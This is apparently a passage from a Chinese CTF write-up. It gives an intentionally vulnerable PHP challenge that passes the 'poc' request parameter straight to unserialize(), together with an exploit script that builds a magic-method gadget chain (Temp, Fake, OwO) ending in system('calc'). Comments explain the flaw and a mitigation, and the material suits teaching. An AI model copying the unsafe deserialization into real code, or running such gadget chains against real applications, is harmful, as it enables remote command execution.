正好还留着当时的源码,先发一波
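<?php
// Challenge source from the write-up, restored to one statement per line.
// The collapsed listing had fused the open tag with the first class
// (`<?phpclass`), which PHP does not recognise as an open tag.
// The code is intentionally vulnerable and its behaviour is left as published.

/**
 * Class whose magic setter turns a property write into a function call.
 */
class Fake
{
    public $firm;
    public $test;

    /**
     * Invoked by PHP when code writes to a property of this object that is
     * not accessible. PHP passes the property name first, the value second.
     *
     * @param string $firm Name of the property being written.
     * @param mixed  $test Value being written (overwritten below, never used).
     */
    public function __set($firm, $test)
    {
        // The incoming value is discarded in favour of a fixed string.
        $test = "No,You can't";
        // NOTE(security): unserialize() runs on the first argument with no
        // allowed_classes restriction, so any loaded class can be instantiated.
        $firm = unserialize($firm);
        // NOTE(security): the deserialized value is invoked as a callable.
        // Nothing here checks what it refers to.
        call_user_func($firm, $test);
    }
}

/**
 * Class whose destructor performs a property write driven by object state.
 */
class Temp
{
    public $pri;
    public $fin = 1;

    /**
     * Writes $this->fin to the property of $this->pri named by $this->action.
     */
    public function __destruct()
    {
        // `action` is not declared on this class; it exists only when
        // something (for example unserialized data) has set it.
        $a = $this->action;
        // NOTE(security): both the target object and the property name come
        // from object state, which unserialize() fills from its input.
        $this->pri->$a = $this->fin;
    }
}

/**
 * Class that calls whatever its $fc property holds, passing $args.
 */
class OwO
{
    public $fc;
    public $args;

    /**
     * @return mixed Result of calling $this->fc with $this->args.
     */
    public function run()
    {
        // NOTE(security): function name and argument are plain public
        // properties; there is no allow-list on what may be called.
        return ($this->fc)($this->args);
    }
}

// NOTE(security): request data goes straight into unserialize(). Every class
// above with a magic method becomes reachable from the `poc` parameter.
// Mitigation: decode untrusted input with json_decode(), or at minimum pass
// ['allowed_classes' => false] as the second argument to unserialize().
$d = $_GET['poc'];
unserialize($d);
?>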
脚本
<?php
/*
 * Script from the write-up: it redefines the challenge classes with
 * constructors that pre-fill their properties, serializes a Temp instance and
 * immediately unserializes the result again.
 *
 * Note for anyone reproducing this: building Temp calls OwO::run() at once, so
 * the command stored in OwO::$args is executed on the machine running this
 * script, before anything is serialized.
 */

/**
 * Copy of the challenge's Fake class (same properties, same magic setter).
 */
class Fake
{
    public $firm;
    public $test;

    /**
     * Called by PHP on a write to an inaccessible property.
     *
     * @param string $firm Name of the property being written.
     * @param mixed  $test Value being written; ignored.
     */
    public function __set($firm, $test)
    {
        $fixedArgument = "No,You can't";
        // The property name is deserialized and the result used as a callable.
        $callable = unserialize($firm);
        call_user_func($callable, $fixedArgument);
    }
}

/**
 * Temp with a constructor that populates every field its destructor reads.
 */
class Temp
{
    public $pri;
    public $fin = 1;

    /**
     * Fills fin with the return value of OwO::run(), pri with a Fake object
     * and action with the string 'firm'.
     */
    public function __construct()
    {
        $runner = new OwO();
        // run() executes here, at construction time.
        $this->fin = $runner->run();
        $this->pri = new Fake();
        // `action` is not declared above, so it is created on assignment.
        $this->action = 'firm';
    }

    /**
     * Assigns $this->fin to the property of $this->pri named by $this->action.
     */
    public function __destruct()
    {
        $propertyName = $this->action;
        $this->pri->$propertyName = $this->fin;
    }
}

/**
 * OwO with a constructor that presets the function name and its argument.
 */
class OwO
{
    public $fc;
    public $args;

    public function __construct()
    {
        $this->fc = 'system';
        $this->args = 'calc';
    }

    /**
     * @return mixed Whatever the function named in $fc returns for $args.
     */
    public function run()
    {
        $callable = $this->fc;

        return $callable($this->args);
    }
}

// $d is deliberately reused: overwriting it releases the Temp object, so its
// destructor runs right after serialize(). The serialized string is never
// printed; it is only fed back into unserialize().
$d = new Temp();
$d = serialize($d);
unserialize($d);
?>